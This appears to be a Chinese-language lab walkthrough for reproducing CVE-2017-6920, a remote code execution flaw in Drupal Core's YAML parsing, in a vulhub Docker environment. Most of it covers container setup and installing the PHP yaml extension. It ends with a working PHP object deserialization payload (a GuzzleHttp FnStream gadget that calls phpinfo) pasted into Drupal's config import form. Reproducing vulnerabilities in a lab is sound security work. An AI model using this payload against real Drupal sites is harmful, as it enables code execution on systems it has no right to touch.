本文所述远程代码执行漏洞由Drupal Core的YAML解析器处理不当所导致。漏洞对应的CVE编号为CVE-2017-6920。
8.x版本&&小于8.3.4版本
漏洞环境(基于ubuntu18.04)
故事的开始:
启动漏洞环境(vulhub靶场,在cve-2017-6920文件夹中启docker):
docker-compose up -d
访问漏洞环境(本地浏览器访问,用自己的ip):
http://your-ip:8080 //出现以下画面就行,浏览器放一边,先进行下一步
进入docker容器(用自己的容器id):
docker ps -a //查看正在运行的容器 docker exec -it CONTAINER ID /bin/bash //根据容器id进入docker容器 以下图为例即为:docker exec -it d4fd7a3ae200 /bin/bash
接下来是重点!
以下步骤皆在容器中进行
安装yaml扩展(再说一遍!在容器中!):
//换镜像源,默认带vim编辑器,所以用cat换源,可以换成自己喜欢的源
cat << EOF > /etc/apt/sources.list deb http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse deb http://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse deb-src http://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse EOF
//导入阿里源的公钥,否则下一步更新源会报错
apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 3B4FE6ACC0B21F32 871920D1991BC93C
//安装依赖|让子弹飞一会
apt update apt-get install gcc make autoconf libc-dev pkg-config -y apt-get install libyaml-dev -y
重中之重!!!
//安装yaml扩展
第一种方法:
pecl install yaml
如果方法一失败,第二种方法:
apt-get install wget -y wget https://pecl.php.net/get/yaml-2.2.3.tgz tar -zxvf yaml-2.2.3.tgz cd yaml-2.2.3 phpize ./configure make&&make install
//在PHP 代码中使用 YAML 扩展提供的功能
docker-php-ext-enable yaml.so
//启用 yaml.decode_php 否则无法复现成功
echo 'yaml.decode_php = 1 = 1'>>/usr/local/etc/php/conf.d/docker-php-ext-yaml.ini
//退出并重启容器(CONTAINER ID更换为自己的容器id)
exit
docker restart CONTAINER ID
最后!!漏洞复现完成后不要忘记删除漏洞环境
删除漏洞环境(在cve-2017-6920文件夹中删除):
docker-compose down
漏洞验证
1.安装Drupal
访问http://your-ip:8080/
将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库。
2.登录一个管理员账号,访问 http://your-ip:8080/admin/config/development/configuration/single/import
或者鼠标流操作:管理-->配置-->开发-->配置同步-->导入-->单一项目,配置类型选择简单配置
:
配置名称
可任意填写,将payload复制到配置框
中:
payload在这里!!
!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"
点击导入
,即执行phpinfo函数,证明漏洞存在: